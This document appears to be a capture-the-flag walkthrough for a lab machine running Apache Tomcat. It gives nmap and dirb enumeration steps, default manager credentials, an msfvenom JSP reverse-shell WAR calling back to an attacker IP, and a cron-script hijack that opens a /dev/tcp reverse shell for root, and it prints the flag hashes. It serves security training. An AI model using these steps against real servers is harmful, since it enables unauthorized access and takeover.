CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


31/10/2024 Shad Hussain Knowledge Views 130 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Thompson - THM

Room link : https://tryhackme.com/r/room/bsidesgtthompson STEP1 nmap -p- -Pn -A -T4 -sSV 10.10.130.169 FINDING 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat 8.5.5 NOTE http is running on port 8080 --------------------------------------------------------------------------------------------------------- STEP2 dirb http://10.10.130.169:8080/ FINDING + http://10.10.130.169:8080/docs (CODE:302|SIZE:0) + http://10.10.130.169:8080/examples (CODE:302|SIZE:0) + http://10.10.130.169:8080/favicon.ico (CODE:200|SIZE:21630) + http://10.10.130.169:8080/host-manager (CODE:302|SIZE:0) + http://10.10.130.169:8080/manager (CODE:302|SIZE:0) --------------------------------------------------------------------------------------------------------- STEP3 http://10.10.130.169:8080/ FINDING + http://10.10.130.169:8080/docs (CODE:302|SIZE:0) + http://10.10.130.169:8080/examples (CODE:302|SIZE:0) + http://10.10.130.169:8080/favicon.ico (CODE:200|SIZE:21630) + http://10.10.130.169:8080/host-manager (CODE:302|SIZE:0) + http://10.10.130.169:8080/manager (CODE:302|SIZE:0) NOTE click on 10.10.130.169:8080/host-manager you will get a login popup cancel it and you will the user id and password ername="tomcat" password="s3cret" roles="admin-gui"/ --------------------------------------------------------------------------------------------------------- STEP4 click on 10.10.130.169:8080/host-manager enter user id and password -- ername="tomcat" password="s3cret" FINDING http://10.10.130.169:8080/manager/html NOTE upload revershell.war in upload and deploy --------------------------------------------------------------------------------------------------------- STEP5 create a .wr revershell using msfvenom msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.65.196 LPORT=9999 -f war -o rshell.war upload the file and see it appears in the list below on new terminal open nc -nvlp 9999 click on the revershell which was uploaded and get e reverse shell --------------------------------------------------------------------------------------------------------- STEP6 cd /home/jack ls -la cat user.txt 39400c90bc683a41a8935e4719f181bf --------------------------------------------------------------------------------------------------------- STEP7 cat /etc/crontab FINDING cd /home/jack && bash id.sh --------------------------------------------------------------------------------------------------------- STEP8 echo bash -i & /dev/tcp/10.17.65.196/8888 0&1 id.sh open listner in new tab nc -nvlp 8888 after few mins you will get a root shell --------------------------------------------------------------------------------------------------------- STEP9 on new root shell ls -la cd /root ls -la cat root.txt d89d5391984c0450a95497153ae7ca3a ---------------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved